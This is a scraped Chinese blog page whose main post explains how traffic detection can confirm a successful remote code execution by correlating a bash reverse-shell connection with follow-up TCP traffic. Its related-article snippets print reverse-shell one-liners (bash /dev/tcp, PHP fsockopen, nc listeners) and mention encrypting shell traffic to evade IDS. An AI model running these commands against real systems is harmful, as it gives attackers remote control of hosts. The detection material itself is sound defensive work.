linux 远程执行本地shell_流量检测如何实锤远程代码执行反弹shell成功

最新推荐文章于 2024-05-17 14:42:20 发布
最新推荐文章于 2024-05-17 14:42:20 发布
阅读量409 收藏
点赞数
文章标签: linux 远程执行本地shell shell 判断 shell执行plsql代码块
通常在渗透中挖掘到了远程代码执行漏洞,攻击者会利用漏洞执行操作系统命令获得系统相关信息,也可写入webshel或者是直接反弹shell到攻击者监听的服务器。 上述的攻击行为也都是有特征可以做检测的,但是仅仅依据特征检测通常只能检测到探测攻击,每台流量检测设备每天的探测日志是海量的,安全运营人员很难从中获得价值信息。如果通过引擎关联上反弹shell的特征以及成功以后的后续动作即可去判断攻击成功服务器沦陷。以bash反弹shell为例: 被攻击的服务器执行代码成功后会反弹shell到172.16.50.123的2333端口:

70fbe24458b1d9a983f1d44f9661cac6.png

获得shell后执行命令:

d9fcea2745821d16d1f64fa46704ad9f.png

检测的思路可根据相关特征把目标ip以及目标端口做缓存,受害资产做源ip地址,此三元组关联一秒内发出的tcp请求即可判断攻击成功:

cb0f471d4b1be0c86dc33f3c4e1c8f5c.png

此类检测优点是能直观帮助安全运营人员实锤攻击成功且服务器沦陷,避免海量日志带来的苦恼,以便作出进一步的应急动作。 缺点是需要引擎支持跨流检测。同时对于正向的特征做好匹配也是此攻击检测的关键,特征部分编码绕过也是需要引起关注的。
weixin_39590453
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shell脚本实现同时多台远程主机执行命令的代码分享
09-15
如果所有主机都成功执行了命令,`success`计数器会增加;如果有主机执行失败,`failed`计数器会增加。最后,脚本会输出一个总结,显示成功和失败的数量。 通过这个shell脚本,我们可以高效地管理多台远程主机,提高...
Linux_Shell.rar_Linux shell_linux shell_linux_shell_shell_unix
07-14
Linux ShellLinux操作系统中不可或缺的一部分,它是一种命令行解释器,允许用户与系统进行交互,执行各种任务。本文将深入探讨Linux Shell的各个方面,包括基本概念、常用命令、脚本编程以及源码分析。 首先,...
网络安全-反弹shell详解(攻击,检测与防御)
2401_84466336的博客
04-23 3124
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
利用OpenSSL加密反弹shell流量
The current road is different, love needs to distinguish between right and wrong
02-15 3220
简介 在进行后渗透阶段的时候通常为了进一步横向操作往往需要反弹 shell,但是反弹 shell 方式都有一个缺点,流量是以明文方式进行传输的。进行流量分析的话就会很快被发现,如果对攻击流量进行溯源分析,检测带有攻击的特征,就可以复现攻击过程。 实验环境 kali:192.168.95.128 centos:192.168.95.147 Wireshark抓包 在kali上使用nc监听一个端口 nc -lvvp 4444 将centos的shell反弹过去 bash -i
命令执行注入告警流量特征-网络安全
weixin_71061514的博客
02-01 555
在看设备告警时候出现命令执行告警,这个可以辅助你判断是否是真实攻击,
网络安全进阶篇之流量加密(十三章-1)使用 Openssl 反弹加密 shell
划水的小白白
05-19 869
文章目录零、什么是OpenSSL?一、为什么要进行流量加密二、抓取流量包三、对数据进行加密 零、什么是OpenSSL? 在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上。 一、为什么要进行流量加密 红队进行渗透测试的后续渗透阶段为了扩大战果,往往需要横行渗透,往往需要反弹 shell,如果反弹 shell 都是明文传输,那么内网里有 IDS 或者防护软件会进行流量进行分析,检测带有攻
linux反弹shell特征提取
SHELLCODE_8BIT的博客
04-09 1980
1.标准输入0的pipe被转到其他进程,也就是只需要匹配bash的0既然,不需要12也匹配,这样减少性能消耗。这种没有回显,但是可以执行命令。pipe和爷进程交互。
CVE-2022-26134-Confluence OGNL表达式注入命令执行漏洞流量特征
12306小哥
06-25 1308
Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。Confluence Server and Data Center存在一个远程代码执行漏洞,未经身份验证的攻击者可以利用该漏洞向目标服务器注入恶意ONGL表达式,进而在目标服务器上执行任意代码。 ...
ftp.rar_FTP SHELL_linux 远程shell_shell
09-24
在这个“ftp.rar_FTP SHELL_linux 远程shell_shell”的压缩包中,我们主要关注的是如何使用FTP在Linux环境中创建一个远程shell,以便进行系统管理或者文件操作。 FTP Shell,即通过FTP协议实现的命令行交互式环境,...
remote_shutdown-1.0.zip_linux 远程shell_remote_关机
09-20
这是一个在linux下可以实现在局域网内实现远程关机及重启的程序,是利用shell开发的。只能在linux下使用。
dos-shell.zip_cmd执行命令_dos shell 编程_远程DOS_远程执行 cmd
09-21
在IT领域,尤其是在系统管理和网络安全方面,了解如何通过DOS Shell和CMD命令行来执行远程命令是一项关键技能。本文将深入探讨"dos-shell.zip_cmd执行命令"、"dos shell编程"、"远程DOS"以及"远程执行cmd"的相关知识...
常见流量特征
最新发布
admin的博客
05-17 916
1、特殊关键字:SQL关键字,如SELECT, WHERE, ORDER BY, UNION, UPDATE,DELETE,INSERT等,这些通常用于构建或修改查询系统函数,如USER(), @@VERSION(在MySQL中),这些可能用于获取数据库版本或当前用户等敏感信息特定数据库的函数或特性,如information_schema(用于获取数据库结构信息)、extractvalue(XML相关函数,有时用于绕过某些过滤)、floor(在盲注中用于产生条件差异)等。
应急响应-MSF流量分析&模式模块&特征提取
siu~
04-13 983
战后-流量分析-MSF
反弹shell汇总,看我一篇就够了
LainWith的博客
12-26 1万+
反弹shell 知识铺垫 什么是shell shell是渗透中常用的名词,像getshell,webshell反弹shell等等,都和shell相关。 getshell:获取到目标的命令执行权限 webshell:指网站后门,通过web服务进行命令执行 反弹shell:把命令行的输入输出转移到其它主机 Shell 俗称壳(用来区别于核),是指“为使用者提供操作界面”的软件(命令解析器)。它类似于DOS下的command.com和后来的cmd.exe。它接收用户命令,然后调用相应的应用程序。简单说用户通
安全技术系列之反弹Shell
好记性不如烂笔头
03-13 2333
常用反弹shell技术汇总
shell反弹的几种方式
nextdoor6的博客
05-16 5853
直接利用linux上的bash进行反弹 nc本地监听 nc -l -p port -vv base反弹 bash -i >& /dev/tcp/ownip/port 0>&1 利用其他服务器运行环境反弹,比如php,python等。 nc本地监听nc -l -p port -vvv php -r '$sock=fsockopen("10.0.0.1",1234);exec
冰蝎下的反弹shell连接msfconsole
热门推荐
Master先生的博客
01-07 5万+
文章目录前言一、使用木马getshell1.搭建环境二、冰蝎配置三、kali监听总结 前言 好久没碰美少妇(MSF)了,恰巧昨天在群里水群,有个表哥问为什么msf监听不到数据。为此我带着表哥的疑问进行了简单的研究。大体的流程和思路我简单记录一下。其中的坑还是不少的,希望这篇文章对初识冰蝎的表哥们有点用处。 一、使用木马getshell 冰蝎之所以强还是在于他的动态二进制加密。这里呢,在冰蝎下载的包中给出了官方的webshell。在server文件夹下。 这里呢,我踩过一个坑。不知道是我电脑配置的问题还是就
渗透测试之反弹shell
Sulli的博客
03-16 506
什么是反弹shell 攻击者想要控制肉鸡,就必须要一个数据传输的通道(TCP/UDP),可以通过ssh或telnet来远程登录来进行操作。这些都是攻击者主动连接肉鸡,如果肉鸡主动连接攻击者实现的shell通道,,就叫反弹shell。 为什么要反弹shell 因为正面不好搞,所以需要反向搞。比如攻击者在肉鸡上上传了一个小马,可能会出现的情况有: 1.肉鸡在局域网内,没有外网地址,连不上。 2.肉鸡有...
python 登录远程linux执行本地shell脚本
05-31
要在 Python 中登录远程 Linux执行本地 shell 脚本,可以使用 `paramiko` 模块来实现。以下是一个简单的示例代码: ```python import paramiko # 连接远程服务器 ssh = paramiko.SSHClient() ssh.set_missing_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值